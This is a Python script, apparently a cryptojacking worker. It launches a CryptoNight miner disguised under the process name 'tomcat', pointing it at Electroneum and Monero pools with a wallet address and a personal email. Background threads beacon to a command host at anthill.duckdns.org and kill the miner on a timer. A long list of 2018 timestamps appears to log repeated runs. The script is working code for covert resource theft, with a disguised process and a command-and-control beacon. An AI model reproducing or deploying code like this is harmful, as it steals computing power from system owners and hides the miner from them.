import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:28:05.255013
#2018-02-17 17:15:04.515852
#2018-02-17 19:04:05.107819
#2018-02-17 20:53:03.915869
#2018-02-17 22:40:02.384338
#2018-02-18 00:24:05.702417
#2018-02-18 02:15:01.513049
#2018-02-18 04:02:01.368039
#2018-02-18 05:53:04.091701
#2018-02-18 07:44:08.592345
#2018-02-18 09:33:05.547225
#2018-02-18 11:18:08.231207
#2018-02-18 13:04:06.205860
#2018-02-18 14:53:02.120640
#2018-02-18 16:40:01.555650
#2018-02-18 18:29:06.041186
#2018-02-18 20:17:06.970408
#2018-02-18 22:02:04.991088
#2018-02-18 23:51:04.159266
#2018-02-19 01:37:05.223356
#2018-02-19 03:25:05.638996
#2018-02-19 05:10:07.208197
#2018-02-19 06:55:01.343491
#2018-02-19 08:43:06.932054
#2018-02-19 10:32:07.392593
#2018-02-19 12:20:04.639836
#2018-02-19 14:07:01.751572
#2018-02-19 15:56:04.238050
#2018-02-19 17:44:03.815207
#2018-02-19 19:32:05.575997
#2018-02-19 21:20:09.253168
#2018-02-19 23:06:05.320815
#2018-02-20 00:52:01.688093
#2018-02-20 02:41:07.591443
#2018-02-20 04:30:07.387538
#2018-02-20 06:14:05.032176
#2018-02-20 07:59:06.111725
#2018-02-20 09:44:08.009666
#2018-02-20 11:28:06.603229
#2018-02-20 13:15:08.435073
#2018-02-20 15:00:03.033749
#2018-02-20 16:44:09.336518
#2018-02-20 18:32:07.428343
#2018-02-20 20:22:08.383912
#2018-02-20 22:09:04.339125
#2018-02-20 23:49:05.187093
#2018-02-21 01:33:07.205755
#2018-02-21 03:21:01.536517
#2018-02-21 05:08:03.611948
#2018-02-21 06:55:04.198362
#2018-02-21 08:41:07.064078
#2018-02-21 10:27:04.733242
#2018-02-21 12:14:04.575365
#2018-02-21 14:02:06.743529
#2018-02-21 15:48:01.695373
#2018-02-21 17:41:06.896967
#2018-02-21 19:27:09.743569
#2018-02-21 21:15:10.294324
#2018-02-21 23:03:08.052332
#2018-02-22 00:50:07.413370
#2018-02-22 02:38:02.184692
#2018-02-22 04:24:06.701887
#2018-02-22 06:10:04.684275
#2018-02-22 07:56:05.493334
#2018-02-22 09:45:03.293827
#2018-02-22 11:29:06.888422
#2018-02-22 13:16:05.576154
#2018-02-22 15:05:08.846449
#2018-02-22 16:49:06.883254
#2018-02-22 18:38:04.394213
#2018-02-22 20:29:06.695678
#2018-02-22 22:15:04.982544
#2018-02-23 00:01:01.778274
#2018-02-23 01:50:04.447333
#2018-02-23 03:46:07.808559
#2018-02-23 05:38:03.397208
#2018-02-23 07:23:03.764048
#2018-02-23 09:27:05.506677
#2018-02-23 11:34:08.324342
#2018-02-23 13:24:08.080409
#2018-02-23 15:09:05.276906
#2018-02-23 16:58:04.159372
#2018-02-23 19:02:07.053145
#2018-02-23 20:47:07.373747
#2018-02-23 22:35:06.922575
#2018-02-24 00:21:06.068071
#2018-02-24 02:12:02.120933
#2018-02-24 04:01:05.130644
#2018-02-24 06:42:07.832228
#2018-02-24 08:32:01.364652
#2018-02-24 10:19:03.758156
#2018-02-24 12:14:05.511720
#2018-02-24 14:02:04.267693
#2018-02-24 15:52:01.223429
#2018-02-24 17:43:06.072923
#2018-02-24 19:28:01.419661
#2018-02-24 21:18:06.544820
#2018-02-24 23:57:01.464853
#2018-02-25 03:14:05.519588
#2018-02-25 06:55:04.877785